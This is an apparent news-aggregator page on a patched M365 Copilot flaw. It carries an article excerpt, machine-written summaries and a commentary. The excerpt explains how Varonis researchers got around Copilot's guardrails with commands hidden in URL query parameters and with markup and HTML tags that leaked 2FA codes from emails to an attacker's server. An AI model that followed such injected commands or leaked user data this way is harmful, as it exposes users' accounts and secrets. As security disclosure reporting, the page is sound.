Critical Copilot vulnerability allowed hackers to seal 2FA code from users

Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.
Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.
Jumping over guardrails
One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside HTML tags such as and

. In either case, a web request showing the data hits the attacker’s web server, where the secret information is captured in logs.
One Microsoft guardrail wraps Copilot output in

 blocks so the browser treats it as straight text. Another is to restrict the sites Copilot is permitted to visit without explicit approval. While Copilot has blanket permission to send requests to Microsoft domains, guardrails restrict requests to untrusted sites.
Security firm Varonis devised an exploit chain that was able to catapult over these guardrails. The first element was what the researchers call a Parameter-to-Prompt Injection. The parameter in this case is the q in a URL, which is used to flag a query that has been included. The Parameter-to-Prompt Injection is a close relative of the prompt injection. The difference is that the malicious command is located in the query parameter, rather than in an email or other piece of untrusted content.

`Facts Only`

Microsoft patched a critical vulnerability in its M365 Copilot AI platform last Tuesday. The vulnerability was discovered and reported by security researchers. Researchers demonstrated a proof-of-concept exploit that could retrieve 2FA codes and other sensitive data from emails accessible to Copilot. The exploit leveraged the AI’s inability to distinguish between user instructions and malicious commands embedded in third-party content. AI systems like Copilot cannot inherently secure the boundary between trusted and untrusted inputs. Guardrails in Copilot and other LLMs include blocking web form submissions and restricting access to untrusted sites. Attackers bypassed these guardrails using markup language and HTML tags to exfiltrate data. One workaround involved wrapping sensitive data in HTML tags like `` or ``, sending it to attacker-controlled servers. Microsoft’s guardrails include wrapping Copilot output in `` blocks and restricting unapproved site access. Security firm Varonis devised an exploit chain using "Parameter-to-Prompt Injection," where malicious commands were hidden in URL query parameters. The vulnerability was rated as "max critical" by Microsoft. The patch was released after the researchers disclosed their findings.

`Executive Summary`

Microsoft recently patched a critical vulnerability in its M365 Copilot AI platform after researchers demonstrated how it could be exploited to extract sensitive data, including two-factor authentication codes, from emails. The flaw stems from the AI's inability to distinguish between legitimate user instructions and malicious commands embedded in third-party content, such as URLs or emails. While Microsoft and other AI providers have implemented guardrails—like blocking web form submissions or restricting access to untrusted sites—researchers at Varonis bypassed these by using markup language and HTML tags to exfiltrate data. Their exploit involved a "Parameter-to-Prompt Injection," where malicious commands were hidden in URL query parameters. This highlights a broader challenge: AI systems lack inherent mechanisms to secure the boundary between trusted and untrusted inputs, forcing providers to rely on reactive, ad hoc defenses. The incident underscores the tension between AI functionality and security. Copilot’s design allows it to interact with user data to perform tasks, but this same capability can be weaponized. Microsoft’s guardrails, such as wrapping output in `` blocks or restricting site access, were circumvented through creative exploitation of markup and HTML. The vulnerability raises questions about the long-term viability of current AI security models, particularly as attackers adapt to evade protections. While the patch addresses this specific flaw, the underlying issue—AI’s inability to contextualize trust—remains unresolved, leaving systems vulnerable to similar attacks in the future.

`Full Take`

This incident reveals a fundamental tension in AI design: the trade-off between utility and security. AI systems like Copilot are built to process and act on user data dynamically, but this same flexibility makes them vulnerable to manipulation. The researchers’ exploit—using markup and URL parameters to bypass guardrails—demonstrates how attackers adapt to defensive measures, exposing the fragility of reactive security models. The deeper issue isn’t just a technical flaw but a paradigm problem: AI lacks the contextual awareness to distinguish intent, forcing providers to play whack-a-mole with exploits rather than addressing the root cause. The narrative here is strong in its technical clarity but risks oversimplifying the broader implications. While the focus is on Microsoft’s specific vulnerability, the pattern echoes systemic challenges in AI security—what might be called "ARC-0012 Trust Boundary Collapse," where systems fail to maintain distinctions between safe and unsafe inputs. The reliance on ad hoc guardrails, rather than foundational fixes, suggests a industry-wide struggle to balance innovation with risk. Who benefits from this dynamic? AI providers gain rapid deployment, but users bear the cost of persistent vulnerabilities. Second-order consequences could include erosion of trust in AI assistants or regulatory pressure to impose stricter controls. Bridge questions: If AI cannot inherently secure trust boundaries, what architectural changes would be needed to mitigate this risk? How might attackers evolve their tactics as guardrails become more sophisticated? And crucially, what incentives would drive AI providers to prioritize foundational security over feature expansion? Counterstrike scan: A coordinated influence campaign might amplify this story to undermine confidence in AI adoption, framing it as an existential security failure. However, the content here is technically grounded and avoids sensationalism, aligning with legitimate security research rather than a manipulative playbook. No structural alignment with attack patterns detected.

`Sentinel — Human`

Confidence
15%

The text exhibits the structure and detail typical of high-quality security journalism, focusing on specific mechanisms and attributing specialized concepts clearly.

Jun 16, 2026, 03:29 PMConsumer Tech & Electronics